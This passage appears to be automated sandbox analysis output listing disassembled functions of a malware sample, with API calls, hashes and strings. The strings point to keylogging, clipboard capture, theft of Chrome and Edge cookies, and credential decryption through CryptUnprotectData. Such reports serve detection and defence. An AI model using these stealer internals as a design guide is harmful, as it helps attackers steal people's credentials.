                                                                                                  • Instruction ID: 39de0d33b69ea9088fa68d935cf3ef43cf04ff0480c7130c1a021fac56d243da
                                                                                                  • Opcode Fuzzy Hash: db79130361b4b0464cab85a352f134925f668321788b49065da1d952b70fcd3f
                                                                                                  • Instruction Fuzzy Hash: 8D4136311083419BC325F722DC51AEFB3A5AF94305F50493EF58A921E2EF385A49C65A
                                                                                                  Function 00443E99 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free
                                                                                                  • String ID:
                                                                                                  • API String ID: 269201875-0
                                                                                                  • Opcode ID: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                  • Instruction ID: bbec49e9ccdd5c2af131aecc9b6810ea24321c3eb42f74c08fbdd36582e243a3
                                                                                                  • Opcode Fuzzy Hash: 1c82e8231a1e7df7fc61a9fb39ee41d92c56425fa3e393906510b0ca3dcf776a
                                                                                                  • Instruction Fuzzy Hash: 5F41E232E00200AFEB14DF78C881A5EB3B5EF89B18F1545AEE915EB351D735AE05CB84
                                                                                                  Function 004511AC Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043F918,?,00000000,?,00000001,?,?,00000001,0043F918,?), ref: 004511F9
                                                                                                  • __alloca_probe_16.LIBCMT ref: 00451231
                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451282
                                                                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0043AF04,?), ref: 00451294
                                                                                                  • __freea.LIBCMT ref: 0045129D
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                  • String ID:
                                                                                                  • API String ID: 313313983-0
                                                                                                  • Opcode ID: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                                                                  • Instruction ID: f723c28c07ecd650b398e20bb728631ced1c531215915adb10fa1f31571a6cea
                                                                                                  • Opcode Fuzzy Hash: 9f5a2a67851111230ceb537eb1b7ccf29ba8faad681cfee17df3cfbc13bcf043
                                                                                                  • Instruction Fuzzy Hash: F7310331A0020AABDF249F65DC41EAF7BA5EB04701F0445AAFC08E72A2E739CC55CB94
                                                                                                  Function 0044F3DA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetEnvironmentStringsW.KERNEL32 ref: 0044F3E3
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F406
                                                                                                    • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435349,?,?,004388C7,?,?,00000000,00476B60,?,0040DE9D,00435349,?,?,?,?), ref: 004461EA
                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F42C
                                                                                                  • _free.LIBCMT ref: 0044F43F
                                                                                                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F44E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 336800556-0
                                                                                                  • Opcode ID: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                  • Instruction ID: b6d7bf627ac8e1e23e8e90154f8049d5dc13ee9613ce4caf203d647ba434722a
                                                                                                  • Opcode Fuzzy Hash: 7d1f56057eec42b9e44eaca7954531e52edb8e618f6c0f5134274d299c642649
                                                                                                  • Instruction Fuzzy Hash: 2401DF72602721BF37211ABB5C8DC7F6AACDEC6FA5355013AFD04D2202DE688D0691B9
                                                                                                  Function 0041C482 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C5A1,00000000,00000000,00000000), ref: 0041C4C1
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4DE
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4EA
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00000000,00406FC0,00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C4FB
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C5A1,00000000,00000000), ref: 0041C508
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseHandle$CreatePointerWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1852769593-0
                                                                                                  • Opcode ID: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                  • Instruction ID: 0233a984b642d2e84dd4fc2cab076f06cd7f632185dc4648213adf39284592b7
                                                                                                  • Opcode Fuzzy Hash: 03b5af7f289a82a83928ea742180afc1da621273c2f808e1c0dcbcf6c59c1bfa
                                                                                                  • Instruction Fuzzy Hash: 6311E571288215BFE7104A24ACC8EBB739CEB46365F10862BF912D22D0C624DC418639
                                                                                                  Function 00448319 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32(?,00000000,?,0043BCD6,00000000,?,?,0043BD5A,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044831E
                                                                                                  • _free.LIBCMT ref: 00448353
                                                                                                  • _free.LIBCMT ref: 0044837A
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00448387
                                                                                                  • SetLastError.KERNEL32(00000000), ref: 00448390
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ErrorLast$_free
                                                                                                  • String ID:
                                                                                                  • API String ID: 3170660625-0
                                                                                                  • Opcode ID: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                  • Instruction ID: 5af5a014564f127a9d6b3613d5887cb4baea3ca98ff5bc54bcf39f1731b7af1a
                                                                                                  • Opcode Fuzzy Hash: 1cfc413842d63f34c7f1edcf4c7ea3bb1e2262b941f6d70642a76626a3a2f89f
                                                                                                  • Instruction Fuzzy Hash: 3401F936100B006BB7117A2A5C45E6F3259DBD2B75B35093FFD1892292EF7ECC02812D
                                                                                                  Function 00450A3C Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00450A54
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 00450A66
                                                                                                  • _free.LIBCMT ref: 00450A78
                                                                                                  • _free.LIBCMT ref: 00450A8A
                                                                                                  • _free.LIBCMT ref: 00450A9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                  • Instruction ID: 72fff71e7c38304dd33e0b5962bcef44c8ad6e5fbb3f6de42623dcf71f8de19c
                                                                                                  • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                                                                  • Instruction Fuzzy Hash: F7F012765053006B9620EB5DE883C1773D9EA157117A68C1BF549DB652C778FCC0866C
                                                                                                  Function 004440E8 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • _free.LIBCMT ref: 00444106
                                                                                                    • Part of subcall function 00446802: HeapFree.KERNEL32(00000000,00000000,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?), ref: 00446818
                                                                                                    • Part of subcall function 00446802: GetLastError.KERNEL32(?,?,00450CEF,?,00000000,?,00000000,?,00450F93,?,00000007,?,?,004514DE,?,?), ref: 0044682A
                                                                                                  • _free.LIBCMT ref: 00444118
                                                                                                  • _free.LIBCMT ref: 0044412B
                                                                                                  • _free.LIBCMT ref: 0044413C
                                                                                                  • _free.LIBCMT ref: 0044414D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 776569668-0
                                                                                                  • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                  • Instruction ID: 0e9c2896d1a2baf17e4b980eca3efa8a556ca0a6e45d827b59e8921ed08f8926
                                                                                                  • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                                                                                  • Instruction Fuzzy Hash: 91F03AB18025208FA731AF2DBD528053BA1A705720356853BF40C62A71C7B849C2DFDF
                                                                                                  Function 00417627 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 182threadwindowCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetWindowThreadProcessId.USER32(?,?), ref: 0041763E
                                                                                                  • GetWindowTextW.USER32(?,?,0000012C), ref: 00417670
                                                                                                  • IsWindowVisible.USER32(?), ref: 00417677
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                                                                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ProcessWindow$Open$TextThreadVisible
                                                                                                  • String ID: (VG
                                                                                                  • API String ID: 3142014140-3443974315
                                                                                                  • Opcode ID: 7e572b315b2ecefe35e30865a6849592f1677189f3bed39c221b32fb02a916d3
                                                                                                  • Instruction ID: 57afc706987f0d359dfa573bc041c79e98ae29994c94316b8148008c339bd05b
                                                                                                  • Opcode Fuzzy Hash: 7e572b315b2ecefe35e30865a6849592f1677189f3bed39c221b32fb02a916d3
                                                                                                  • Instruction Fuzzy Hash: 6E7109311082419AC365FB22D8959EFB3E5BFD4308F50493FF18A560E5EF746A49CB8A
                                                                                                  Function 00413A90 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 179registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413AF7
                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413B26
                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413BC6
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Enum$InfoQueryValue
                                                                                                  • String ID: [regsplt]
                                                                                                  • API String ID: 3554306468-4262303796
                                                                                                  • Opcode ID: 6209f9adf3ebd54435f0d7a716eb47a0d81ae306c6dd88b89f6c65b2c0b42e3c
                                                                                                  • Instruction ID: fa843d34e07254c46a29a5d4d7bbb73928c81f50e0ccc4a220fcc0531dc04ae2
                                                                                                  • Opcode Fuzzy Hash: 6209f9adf3ebd54435f0d7a716eb47a0d81ae306c6dd88b89f6c65b2c0b42e3c
                                                                                                  • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                                                                                  Function 0040404C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93sleepCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                                                                                    • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040407C), ref: 0041BA30
                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                                                                    • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                                                                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                                                                                  • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                                                                                  • String ID: /sort "Visit Time" /stext "$@NG
                                                                                                  • API String ID: 368326130-3944316004
                                                                                                  • Opcode ID: 115d3ed6b1741adb512821b11b245dc659c1e2162bd541144790ef051353569d
                                                                                                  • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                                                                                  • Opcode Fuzzy Hash: 115d3ed6b1741adb512821b11b245dc659c1e2162bd541144790ef051353569d
                                                                                                  • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                                                                                  Function 0040B783 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040B7D2
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Init_thread_footer__onexit
                                                                                                  • String ID: [End of clipboard]$[Text copied to clipboard]$ mG
                                                                                                  • API String ID: 1881088180-2322839566
                                                                                                  • Opcode ID: 811cdfe000e459d503bb944029386f8ceaa377eb4ffdcb54278a65b681284296
                                                                                                  • Instruction ID: 5c7e69c9d376070a9f10adc198010d279a990252db190bacd7f595afc81a80c0
                                                                                                  • Opcode Fuzzy Hash: 811cdfe000e459d503bb944029386f8ceaa377eb4ffdcb54278a65b681284296
                                                                                                  • Instruction Fuzzy Hash: B5216D31A102198ACB14FBA6D8929EDB375AF54318F10403FE506771E2EF7C6D4ACA8C
                                                                                                  Function 0040C627 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                                                                                  Strings
                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                  • Opcode ID: 8e16928b384ae0ce72e815ae57c22294848a02c61a8a71f4ba9d785bccdf6d95
                                                                                                  • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                                                                                  • Opcode Fuzzy Hash: 8e16928b384ae0ce72e815ae57c22294848a02c61a8a71f4ba9d785bccdf6d95
                                                                                                  • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                                                                                  Function 0040C6F6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 72COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                                                                                  • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                                                                                  • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                                                                                  Strings
                                                                                                  • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                                                                                  • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExistsFilePath
                                                                                                  • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                                                                                  • API String ID: 1174141254-1980882731
                                                                                                  • Opcode ID: 3001d16f89ba5f9bfed8131fc8dfd9e41104078c7e185fc4d6da829b92f4ee01
                                                                                                  • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                                                                                  • Opcode Fuzzy Hash: 3001d16f89ba5f9bfed8131fc8dfd9e41104078c7e185fc4d6da829b92f4ee01
                                                                                                  • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                                                                                  Function 0040A1B4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2B8,00475100,00000000,00000000), ref: 0040A239
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,00475100,00000000,00000000), ref: 0040A249
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,00475100,00000000,00000000), ref: 0040A255
                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread$LocalTimewsprintf
                                                                                                  • String ID: Offline Keylogger Started
                                                                                                  • API String ID: 465354869-4114347211
                                                                                                  • Opcode ID: aa941b6b780eb50f2f111ff82fee1c60cdd0ed452bf655484a5542b8935c980e
                                                                                                  • Instruction ID: fa9a7328340dc7f48b0d085764b542104813bfc3ea66268f7111ac5d0199d402
                                                                                                  • Opcode Fuzzy Hash: aa941b6b780eb50f2f111ff82fee1c60cdd0ed452bf655484a5542b8935c980e
                                                                                                  • Instruction Fuzzy Hash: 1111ABB12003187ED210BB368C87CBB765DDA4139CB40057FF946221C2EA795D14CAFB
                                                                                                  Function 0040AF29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 65threadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,Offline Keylogger Started,00475100), ref: 0040B1AD
                                                                                                    • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                                                                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2A2,?,00000000,00000000), ref: 0040AFA9
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2C4,?,00000000,00000000), ref: 0040AFB5
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread$LocalTime$wsprintf
                                                                                                  • String ID: Online Keylogger Started
                                                                                                  • API String ID: 112202259-1258561607
                                                                                                  • Opcode ID: 1642843c4aeb719f804d1b1faf349d7b90b73fbf07dec7ef3d168b84b43abf66
                                                                                                  • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                                                                                  • Opcode Fuzzy Hash: 1642843c4aeb719f804d1b1faf349d7b90b73fbf07dec7ef3d168b84b43abf66
                                                                                                  • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                                                                                  Function 00404F51 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58timethreadCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00404F81
                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                                                                                  Strings
                                                                                                  • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Create$EventLocalThreadTime
                                                                                                  • String ID: KeepAlive | Enabled | Timeout:
                                                                                                  • API String ID: 2532271599-1507639952
                                                                                                  • Opcode ID: 265870ca6a49f1cfdf3a79916e036cd98acee69504672a74e3c9871262499b03
                                                                                                  • Instruction ID: 4df055e7b18788cc2e6f6b282d58d8d1f041b9f055d7d752625e2c9c7705ec55
                                                                                                  • Opcode Fuzzy Hash: 265870ca6a49f1cfdf3a79916e036cd98acee69504672a74e3c9871262499b03
                                                                                                  • Instruction Fuzzy Hash: D7110A71900385BAC720A7779C0DEABBFACDBD2714F04046FF54162291D6B89445CBBA
                                                                                                  Function 00406A9E Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: CryptUnprotectData$crypt32
                                                                                                  • API String ID: 2574300362-2380590389
                                                                                                  • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                  • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                                                                                  • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                                                                                  • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                                                                                  Function 0040515C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 46synchronizationCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                                                                                  • CloseHandle.KERNEL32(?), ref: 004051CA
                                                                                                  • SetEvent.KERNEL32(?), ref: 004051D9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000017.00000002.1931941329.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_23_2_400000_AddInProcess32.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseEventHandleObjectSingleWait
                                                                                                  • String ID: Connection Timeout
                                                                                                  • API String ID: 2055531096-499159329
                                                                                                  • Opcode ID: f68205fbbd132f7411d12c93b7f65b2f09768eee2fc5ae5d8c71895408bf9877
                                                                                                  • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                                                                                  • Opcode Fuzzy Hash: f68205fbbd132f7411d12c93b7f65b2f09768eee2fc5ae5d8c71895408bf9877
